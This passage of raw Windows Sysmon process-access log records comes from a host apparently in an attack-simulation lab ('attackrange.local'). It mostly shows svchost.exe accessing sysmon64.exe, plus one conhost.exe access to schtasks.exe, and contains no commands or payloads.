a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5693,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5694,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5695,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5696,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5697,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5698,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5699,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5700,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5701,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.166\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 